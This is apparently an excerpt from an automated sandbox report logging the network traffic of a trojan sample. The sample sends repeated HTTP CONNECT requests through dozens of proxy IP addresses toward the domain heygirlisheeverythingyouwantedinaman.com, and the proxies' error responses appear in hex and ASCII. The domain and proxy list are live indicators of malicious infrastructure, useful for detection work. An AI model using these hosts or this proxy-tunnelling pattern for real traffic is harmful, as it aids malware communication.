                                                                                Feb 23, 2024 14:28:22.960341930 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.944752932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.898341894 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.817112923 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                19192.168.2.84982045.11.95.16550225828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.270791054 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:30.859267950 CET228INHTTP/1.0 502 Bad Gateway
                                                                                Connection: close
                                                                                Content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                20192.168.2.849896154.12.253.232250075828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.277415991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.616592884 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.960352898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                21192.168.2.849868138.68.60.831285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.279169083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.434562922 CET28INHTTP/1.1 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                22192.168.2.84998913.41.14.54435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.312529087 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                23192.168.2.849880167.99.131.11805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.313812971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.484736919 CET831INHTTP/1.1 500 Internal Server Error
                                                                                Date: Fri, 23 Feb 2024 12:38:51 GMT
                                                                                Server: Apache/2.4.29 (Ubuntu)
                                                                                Content-Length: 639
                                                                                Connection: close
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                24192.168.2.84986045.11.95.16550325828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.319550037 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                25192.168.2.849863176.98.81.8580805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.320692062 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                26192.168.2.84999413.41.14.54435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.321706057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                27192.168.2.84979213.229.47.109805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.330158949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.681118965 CET224INHTTP/1.1 400 Bad Request
                                                                                Date: Fri, 23 Feb 2024 13:26:10 GMT
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Content-Length: 12
                                                                                X-Kong-Response-Latency: -4.7683715820313e-05
                                                                                Server: kong/2.8.1
                                                                                Data Raw: 42 61 64 20 72 65 71 75 65 73 74 0a
                                                                                Data Ascii: Bad request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                28192.168.2.84985245.185.236.25410805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.337941885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.882210970 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                29192.168.2.849894113.30.149.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.338701963 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                30192.168.2.849947104.25.58.39805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.339200020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.427174091 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                31192.168.2.849952104.20.205.191805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.346851110 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.434597015 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                32192.168.2.84979160.188.102.225180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.348975897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.116584063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.257275105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.849955172.67.69.9805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.350208044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.438314915 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.84988993.90.212.241535828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.417974949 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.85000045.12.30.231805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.419682026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.507616997 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.84985043.231.22.229805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.434242964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.769519091 CET343INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 182
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.849858210.209.236.26805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.440118074 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.771853924 CET326INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.849883101.231.64.8984435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.447510004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.84997851.15.242.20288885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.457380056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.617536068 CET309INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.21.6
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 157
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 36 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.6</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.84998718.135.211.18231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.464688063 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.634998083 CET167INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/plain
                                                                                X-Powered-By: PHP/5.4.7
                                                                                Server: squid/6.0.0-20220501-re899e0c27
                                                                                Content-Length: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.84992220.219.177.8531295828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.477931976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.757642031 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.850035172.67.182.77805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.491904974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.579205036 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:22 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.850038104.18.254.76805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:22.493756056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:22.581162930 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
